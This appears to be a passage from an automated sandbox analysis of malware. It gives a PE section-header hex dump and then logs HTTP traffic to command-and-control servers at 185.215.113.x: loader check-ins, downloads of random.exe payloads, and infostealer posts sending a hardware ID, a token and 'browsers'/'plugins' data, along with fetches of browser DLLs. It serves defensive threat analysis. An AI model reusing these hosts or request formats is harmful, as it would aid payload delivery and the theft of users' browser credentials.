00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000051000&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 01 Sep 2024 01:45:41 GMTIf-None-Match: "66d3c745-1b0600"
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000052000&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBHost: 185.215.113.100Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 41 41 32 42 32 35 46 34 34 36 33 36 38 32 32 34 35 35 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 2d 2d 0d 0a Data Ascii: ------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="hwid"BCAA2B25F446368224558------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="build"leva------CFBAKKJDBKJJJKFHDAEB--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCFIEBKEGHIDGCAFBFHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 46 49 45 42 4b 45 47 48 49 44 47 43 41 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 64 35 36 65 38 30 34 38 33 62 66 65 63 30 33 34 32 31 61 37 62 31 34 37 37 35 33 61 33 37 34 65 65 66 34 65 31 32 37 38 34 36 35 32 39 37 32 32 31 30 37 36 33 39 65 62 31 33 61 35 66 61 63 63 62 36 62 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 46 49 45 42 4b 45 47 48 49 44 47 43 41 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 46 49 45 42 4b 45 47 48 49 44 47 43 41 46 42 46 2d 2d 0d 0a Data Ascii: ------FBFCFIEBKEGHIDGCAFBFContent-Disposition: form-data; name="token"d2d56e80483bfec03421a7b147753a374eef4e127846529722107639eb13a5faccb6b7bb------FBFCFIEBKEGHIDGCAFBFContent-Disposition: form-data; name="message"browsers------FBFCFIEBKEGHIDGCAFBF--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJKHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 64 35 36 65 38 30 34 38 33 62 66 65 63 30 33 34 32 31 61 37 62 31 34 37 37 35 33 61 33 37 34 65 65 66 34 65 31 32 37 38 34 36 35 32 39 37 32 32 31 30 37 36 33 39 65 62 31 33 61 35 66 61 63 63 62 36 62 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 44 41 46 43 46 48 49 45 48 4a 4a 4b 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="token"d2d56e80483bfec03421a7b147753a374eef4e127846529722107639eb13a5faccb6b7bb------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="message"plugins------DGIJDAFCFHIEHJJKEHJK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDGHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 64 35 36 65 38 30 34 38 33 62 66 65 63 30 33 34 32 31 61 37 62 31 34 37 37 35 33 61 33 37 34 65 65 66 34 65 31 32 37 38 34 36 35 32 39 37 32 32 31 30 37 36 33 39 65 62 31 33 61 35 66 61 63 63 62 36 62 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="token"d2d56e80483bfec03421a7b147753a374eef4e127846529722107639eb13a5faccb6b7bb------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="message"fplugins------JDBGHIIDAECBFIDHIIDG--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCFHIDAKECFHIEBFCGIHost: 185.215.113.100Content-Length: 5195Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000053001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 185.215.113.100Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCFHDHIIIECBGCAKFIHost: 185.215.113.100Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIEHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 64 35 36 65 38 30 34 38 33 62 66 65 63 30 33 34 32 31 61 37 62 31 34 37 37 35 33 61 33 37 34 65 65 66 34 65 31 32 37 38 34 36 35 32 39 37 32 32 31 30 37 36 33 39 65 62 31 33 61 35 66 61 63 63 62 36 62 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 2d 2d 0d 0a Data Ascii: ------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="token"d2d56e80483bfec03421a7b147753a374eef4e127846529722107639eb13a5faccb6b7bb------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="file"------JKJEHJKJEBGHJJKEBGIE--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFIHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 64 35 36 65 38 30 34 38 33 62 66 65 63 30 33 34 32 31 61 37 62 31 34 37 37 35 33 61 33 37 34 65 65 66 34 65 31 32 37 38 34 36 35 32 39 37 32 32 31 30 37 36 33 39 65 62 31 33 61 35 66 61 63 63 62 36 62 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="token"d2d56e80483bfec03421a7b147753a374eef4e127846529722107639eb13a5faccb6b7bb------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file"------HJKKFIJKFCAKJJJKJKFI--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJKHost: 185.215.113.100Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
